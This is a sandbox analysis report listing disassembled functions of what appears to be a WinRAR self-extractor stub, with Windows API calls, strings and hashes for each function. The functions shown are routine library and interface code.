Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: Window$Show$RectText
String ID: RarHtmlClassName
API String ID: 3937224194-1658105358
Opcode ID: 0bb64b7f5addd5dfb3b177dc79f1c59ce31cf4c61280999ff6d2ad6743139f8d
Instruction ID: eb12e1b26cff43d5a3d51bbf2610644a72511fafcd89efc5d2be1251b0b8be94
Opcode Fuzzy Hash: 0bb64b7f5addd5dfb3b177dc79f1c59ce31cf4c61280999ff6d2ad6743139f8d
Instruction Fuzzy Hash: 4C41D232408314EFC7226F659C49BAB7BB8FF48761F004519F9859904ACB79D854EF61

Function 00FB9955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00FB995E
_wcslen.LIBCMT ref: 00FB9993

Strings

<style>body{font-family:"Arial";font-size:12;}</style>, xrefs: 00FB9987
, xrefs: 00FB99B0
 , xrefs: 00FB9A21
<br>, xrefs: 00FB99DF

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: _wcslen
String ID: $ $<br>$<style>body{font-family:"Arial";font-size:12;}</style>
API String ID: 176396367-3743748572
Opcode ID: 250fe3547d55522045bee7945113ec88869e16fdfff9b54684a1eb8772d66de3
Instruction ID: c9956cd1d7b07029d6df02ec48b1a9ccb6355e389ba640cd3786623a8feb388e
Opcode Fuzzy Hash: 250fe3547d55522045bee7945113ec88869e16fdfff9b54684a1eb8772d66de3
Instruction Fuzzy Hash: E9318032A4C30656D630AB515C43BF673A8EB40730F50841FFA82972C0FAE8ED44A7A1

Function 00FCC8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00FCC868: _free.LIBCMT ref: 00FCC891

_free.LIBCMT ref: 00FCC8F2

Part of subcall function 00FC8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00FCC896,?,00000000,?,00000000,?,00FCC8BD,?,00000007,?,?,00FCCCBA,?), ref: 00FC8DE2
Part of subcall function 00FC8DCC: GetLastError.KERNEL32(?,?,00FCC896,?,00000000,?,00000000,?,00FCC8BD,?,00000007,?,?,00FCCCBA,?,?), ref: 00FC8DF4

_free.LIBCMT ref: 00FCC8FD
_free.LIBCMT ref: 00FCC908
_free.LIBCMT ref: 00FCC95C
_free.LIBCMT ref: 00FCC967
_free.LIBCMT ref: 00FCC972
_free.LIBCMT ref: 00FCC97D

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction ID: 5483f74e04e39b741b4816a659fa22ef205eb51502bfbf097f93725a1cce3d4e
Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction Fuzzy Hash: 6A110071580706A6E520B771DD07FCB7BBC9F04B00F804C1DF2DE660D2DA6AA506A790

Function 00FBE5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00FBE669,00FBE5CC,00FBE86D), ref: 00FBE605
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00FBE61B
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00FBE630

Strings

KERNEL32.DLL, xrefs: 00FBE600
ReleaseSRWLockExclusive, xrefs: 00FBE625
AcquireSRWLockExclusive, xrefs: 00FBE615

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 667068680-1718035505
Opcode ID: ba4c0d484c4e40e0559174937670b913727e0c0a19f3e7430c191962f58be8cf
Instruction ID: 8dfd516a75def021128f55184938e69d8d149cf61ebab2905492eef3b5eec552
Opcode Fuzzy Hash: ba4c0d484c4e40e0559174937670b913727e0c0a19f3e7430c191962f58be8cf
Instruction Fuzzy Hash: 8DF0C232B612265B0B224F76AC88BE633CB6E25769308043AE941D3240EB24CC507F92

Function 00FB146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32(?,?), ref: 00FB14C2

Part of subcall function 00FAB146: GetVersionExW.KERNEL32(?), ref: 00FAB16B

LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00FB14E6
FileTimeToSystemTime.KERNEL32(?,?), ref: 00FB1500
TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00FB1513
SystemTimeToFileTime.KERNEL32(?,?), ref: 00FB1523
SystemTimeToFileTime.KERNEL32(?,?), ref: 00FB1533

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: e286f7340b62eeb720a2b17f8555227b15fdf17a11af1588f285bc2bb262be94
Instruction ID: d09df96ef25002d876421761cd4715735babe722ec56f905a759d6f3b574264c
Opcode Fuzzy Hash: e286f7340b62eeb720a2b17f8555227b15fdf17a11af1588f285bc2bb262be94
Instruction Fuzzy Hash: 2631F87550830AABC700DFA9C88499BB7F8BF98714F444A1EF999C3210E730D509DBA6

Function 00FC2AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00FC2AF1,00FC02FC,00FBFA34), ref: 00FC2B08
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00FC2B16
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00FC2B2F
SetLastError.KERNEL32(00000000,00FC2AF1,00FC02FC,00FBFA34), ref: 00FC2B81

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: e5c7388b40f8cb465dac1af47bba1d2fece816e94ce8981f00d4e6784bdfaf8b
Instruction ID: 18aff2c928f9671e1c9f48a1384655674b735d65ef529e5750099cf586bf416e
Opcode Fuzzy Hash: e5c7388b40f8cb465dac1af47bba1d2fece816e94ce8981f00d4e6784bdfaf8b
Instruction Fuzzy Hash: 6301D83250A71B6DE7942B747E87F163B56EB817B4760473EF120550F0EF114C007244

Function 00FC97E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00FE1030,00FC4674,00FE1030,?,?,00FC3F73,00000050,?,00FE1030,00000200), ref: 00FC97E9
_free.LIBCMT ref: 00FC981C
_free.LIBCMT ref: 00FC9844
SetLastError.KERNEL32(00000000,?,00FE1030,00000200), ref: 00FC9851
SetLastError.KERNEL32(00000000,?,00FE1030,00000200), ref: 00FC985D
_abort.LIBCMT ref: 00FC9863

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 3f87b3b235e35d09260b6b10f7757e30f29545abe84ae905ed0b46684fcaf56b
Instruction ID: 6133ad9aa4e19589874005e5846797d00308260a35cc8ff3786193de8e2d257d
Opcode Fuzzy Hash: 3f87b3b235e35d09260b6b10f7757e30f29545abe84ae905ed0b46684fcaf56b
Instruction Fuzzy Hash: 4FF0443690860362C7123334BE0FF1B3B268FD2B74F24013DF625931D2EEA48802B265

Function 00FBDC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,0000000A), ref: 00FBDC47
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00FBDC61
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FBDC72
TranslateMessage.USER32(?), ref: 00FBDC7C
DispatchMessageW.USER32(?), ref: 00FBDC86
WaitForSingleObject.KERNEL32(?,0000000A), ref: 00FBDC91

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: Message$ObjectSingleWait$DispatchPeekTranslate
String ID:
API String ID: 2148572870-0
Opcode ID: ed5fccc7aec15d451e4179dc2d22b52e024c9c121517f9e84dc72e34dcc1de7a
Instruction ID: 8d38efeb9fddaa1fee412948e06dea86e64292696760d12f9c9e2d599b185141
Opcode Fuzzy Hash: ed5fccc7aec15d451e4179dc2d22b52e024c9c121517f9e84dc72e34dcc1de7a
Instruction Fuzzy Hash: BAF08C72A02219BBCB22ABA2DC0CDCB7F7DEF417A1F004011B50AE6045E63A8546CBA1

Function 00FAC0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 00FB05DA: _wcslen.LIBCMT ref: 00FB05E0

Part of subcall function 00FAB92D: _wcsrchr.LIBVCRUNTIME ref: 00FAB944

_wcslen.LIBCMT ref: 00FAC197
_wcslen.LIBCMT ref: 00FAC1DF

Strings

.rar, xrefs: 00FAC0E1, 00FAC134
.exe, xrefs: 00FAC10B
.sfx, xrefs: 00FAC11A

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: _wcslen$_wcsrchr
String ID: .exe$.rar$.sfx
API String ID: 3513545583-31770016
Opcode ID: 7150fa32ee3845c1670eb5185e9d60489ad200fae5c247cca6148be2c9439729
Instruction ID: 98c2ef80feeba6422ded626590e0682ea3e6dee48a3034314737ae9b23cf4db5
Opcode Fuzzy Hash: 7150fa32ee3845c1670eb5185e9d60489ad200fae5c247cca6148be2c9439729
Instruction Fuzzy Hash: AC4139A6A0431195C732AF348C52A7B73A4EF42764F14490EF981AB182EB548D81F3E2

Function 00FBCE87 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000800,?), ref: 00FBCE9D

Part of subcall function 00FAB690: _wcslen.LIBCMT ref: 00FAB696

_swprintf.LIBCMT ref: 00FBCED1

Part of subcall function 00FA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FA40A5

SetDlgItemTextW.USER32(?,00000066,00FE946A), ref: 00FBCEF1
EndDialog.USER32(?,00000001), ref: 00FBCFFE

Strings

%s%s%u, xrefs: 00FBCEC6

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
String ID: %s%s%u
API String ID: 110358324-1360425832
Opcode ID: f4e072c3639d8c6dd3855a1ce2dc3568d047973614fbb293d1c84a58577ae487
Instruction ID: 5a0239febd003aada78afb7b704c37c1b236ea7b13c220b6d8add858684bdc98
Opcode Fuzzy Hash: f4e072c3639d8c6dd3855a1ce2dc3568d047973614fbb293d1c84a58577ae487
Instruction Fuzzy Hash: AD4163B5900259AADF21DB91CC85FEA77FDEB05350F4080A6F909E7041EE749A44EFB2

Function 00FABB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00FABB27
GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00FAA275,?,?,00000800,?,00FAA23A,?,00FA755C), ref: 00FABBC5
_wcslen.LIBCMT ref: 00FABC3B

Strings

\\?\, xrefs: 00FABB52, 00FABB99, 00FABBF7, 00FABC4E
UNC, xrefs: 00FABBA7

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: _wcslen$CurrentDirectory
String ID: UNC$\\?\
API String ID: 3341907918-253988292
Opcode ID: da01eb4b9dc7284bf054848c5d31dcdede9a2c5d6399f41a684521ec1f0137cb
Instruction ID: 7f5473e2713881b46eb3da325a25f495c4fb5fae454d148823cd0c1394cfb501
Opcode Fuzzy Hash: da01eb4b9dc7284bf054848c5d31dcdede9a2c5d6399f41a684521ec1f0137cb
Instruction Fuzzy Hash: AF41B7B1900216A6CF21AF61CC41FEB7769AF423A0F144566F514A3152EF74EE90FB61

Function 00FBB6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

LoadBitmapW.USER32(00000065), ref: 00FBB6ED
GetObjectW.GDI32(00000000,00000018,?), ref: 00FBB712
DeleteObject.GDI32(00000000), ref: 00FBB744
DeleteObject.GDI32(00000000), ref: 00FBB767

Part of subcall function 00FBA6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00FBB73D,00000066), ref: 00FBA6D5
Part of subcall function 00FBA6C2: SizeofResource.KERNEL32(00000000,?,?,?,00FBB73D,00000066), ref: 00FBA6EC
Part of subcall function 00FBA6C2: LoadResource.KERNEL32(00000000,?,?,?,00FBB73D,00000066), ref: 00FBA703
Part of subcall function 00FBA6C2: LockResource.KERNEL32(00000000,?,?,?,00FBB73D,00000066), ref: 00FBA712
Part of subcall function 00FBA6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00FBB73D,00000066), ref: 00FBA72D
Part of subcall function 00FBA6C2: GlobalLock.KERNEL32(00000000), ref: 00FBA73E
Part of subcall function 00FBA6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00FBA762
Part of subcall function 00FBA6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00FBA7A7
Part of subcall function 00FBA6C2: GlobalUnlock.KERNEL32(00000000), ref: 00FBA7C6
Part of subcall function 00FBA6C2: GlobalFree.KERNEL32(00000000), ref: 00FBA7CD

Strings

], xrefs: 00FBB71A

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
String ID: ]
API String ID: 1797374341-3352871620
Opcode ID: d1f606b6b1e0afbc0e4a70775065bf335c17b1327fda5c36b03ff7c6ee747323
Instruction ID: f08bcee7bb456719bcf1c668784fbce344d447083865e5658fee82da115de456
Opcode Fuzzy Hash: d1f606b6b1e0afbc0e4a70775065bf335c17b1327fda5c36b03ff7c6ee747323
Instruction Fuzzy Hash: 6B01D6369006056BC723B7765C49AFF7B7AAFC0762F180011F940AB285DFBACD056E61

Function 00FBD600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00FA1316: GetDlgItem.USER32(00000000,00003021), ref: 00FA135A
Part of subcall function 00FA1316: SetWindowTextW.USER32(00000000,00FD35F4), ref: 00FA1370

EndDialog.USER32(?,00000001), ref: 00FBD64B
GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00FBD661
SetDlgItemTextW.USER32(?,00000066,?), ref: 00FBD675
SetDlgItemTextW.USER32(?,00000068), ref: 00FBD684

Strings

RENAMEDLG, xrefs: 00FBD618

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: RENAMEDLG
API String ID: 445417207-3299779563
Opcode ID: c6b90d10e119bd0f20145e46d2dec2269d1df4a93df7907e255c27d161854fc7
Instruction ID: c5b156cb09408a174eb20d5ff81470e054bb14b85058af7de455e0bdd859a488
Opcode Fuzzy Hash: c6b90d10e119bd0f20145e46d2dec2269d1df4a93df7907e255c27d161854fc7
Instruction Fuzzy Hash: E4014533645224BAD2224F669D09FE7776EBF5AB01F010011F345A6094C7A39904AF7A

Function 00FC7E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00FC7E24,00000000,?,00FC7DC4,00000000,00FDC300,0000000C,00FC7F1B,00000000,00000002), ref: 00FC7E93
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00FC7EA6
FreeLibrary.KERNEL32(00000000,?,?,?,00FC7E24,00000000,?,00FC7DC4,00000000,00FDC300,0000000C,00FC7F1B,00000000,00000002), ref: 00FC7EC9

Strings

mscoree.dll, xrefs: 00FC7E8C
CorExitProcess, xrefs: 00FC7E9E

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 15f6eef74bd9efbbc44936df75dfba6f5c7c7df82ab257ee29c77d755e368491
Instruction ID: 6c6ac6cb58ca13b3eb128fdde3015a9e417260c7f68925e3822029f07a1d7d3b
Opcode Fuzzy Hash: 15f6eef74bd9efbbc44936df75dfba6f5c7c7df82ab257ee29c77d755e368491
Instruction Fuzzy Hash: D2F06835E0120DBBCB11AFB0DC09B9EBFB6EF44715F0440AAF905E2250DB319E44EA91

Function 00FAF2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00FB081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00FB0836
Part of subcall function 00FB081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00FAF2D8,Crypt32.dll,00000000,00FAF35C,?,?,00FAF33E,?,?,?), ref: 00FB0858

GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00FAF2E4
GetProcAddress.KERNEL32(00FE81C8,CryptUnprotectMemory), ref: 00FAF2F4

Strings

CryptUnprotectMemory, xrefs: 00FAF2EA
Crypt32.dll, xrefs: 00FAF2CE
CryptProtectMemory, xrefs: 00FAF2DE

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

